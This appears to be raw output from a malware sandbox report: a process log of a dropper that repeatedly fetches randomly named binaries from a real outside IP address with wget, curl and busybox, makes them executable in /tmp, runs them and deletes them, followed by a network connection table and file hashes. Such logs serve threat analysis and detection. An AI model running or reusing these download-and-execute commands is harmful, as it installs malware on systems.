/bin/chmod
[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/rm
[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/wget
[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/chmod
[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/rm
[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/wget
[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/chmod
[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/rm
[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/wget
[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/chmod
[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/rm
[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/wget
[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/chmod
[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/rm
[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/wget
[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/chmod
[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/rm
[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/wget
[wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/chmod
[chmod 777 KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/tmp/KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto
[./KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/bin/rm
[rm KKZNRTjK2Os3nj6EIvLjb7QO2m6tKFpNto]
/usr/bin/wget
[wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/chmod
[chmod 777 mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/tmp/mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC
[./mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/bin/rm
[rm mkxzt2enVBSE1nQv90vQcoDPIj2NJbi5GC]
/usr/bin/wget
[wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/chmod
[chmod 777 yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/tmp/yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev
[./yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/bin/rm
[rm yW1XYiXvkvFLpczBUtpSwxwEttm3KdQSev]
/usr/bin/wget
[wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/chmod
[chmod 777 SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/tmp/SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD
[./SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/bin/rm
[rm SnYqF3gM82ufhbjFjMRdYHCMHjaN5RicHD]
/usr/bin/wget
[wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/chmod
[chmod 777 YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/tmp/YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1
[./YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/bin/rm
[rm YRTe6u2Dyfs7ThBSQh9oaLZ1ATRwJLg8S1]
/usr/bin/wget
[wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/chmod
[chmod 777 IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/tmp/IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL
[./IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/bin/rm
[rm IMXTFMf2sGSbsalplAD3CM2xDEyIzuulnL]
/usr/bin/wget
[wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/chmod
[chmod 777 pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/tmp/pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz
[./pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/bin/rm
[rm pG0qqetnhFR4512JpyD7pyxXV3WA0x3JKz]
/usr/bin/wget
[wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/chmod
[chmod 777 O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/tmp/O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0
[./O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/bin/rm
[rm O7SiglMiy1JzDi5dhjdE0dEkFT2By8kgY0]
/usr/bin/wget
[wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/chmod
[chmod 777 GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
[./GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/bin/rm
[rm GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J]
/usr/bin/wget
[wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/chmod
[chmod 777 ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/tmp/ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d
[./ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/bin/rm
[rm ol4qsFnxqEX3D1wp8MGKuhqpxU9bEas99d]
/usr/bin/wget
[wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/chmod
[chmod 777 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/tmp/1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ
[./1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/bin/rm
[rm 1bZ9jnHrhv61tCZOW4vKbNotiwXsR8szGZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/chmod
[chmod 777 i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/tmp/i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0
[./i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/bin/rm
[rm i04fYD7m6vDlAFPfuTp4is0wPgk9BLSCW0]
/usr/bin/wget
[wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/chmod
[chmod 777 IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/tmp/IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ
[./IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/bin/rm
[rm IYOi3zv90gQ4rU8KLZ1UHsuPceFrCigyuQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/chmod
[chmod 777 LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/tmp/LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g
[./LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
/bin/rm
[rm LKFtdQ9yQs6YWABNXrr8SGi2cjISyhRh2g]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/GfLiKIYH6Y7TcSa5uygF5EtPJPkBNSLk5J
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |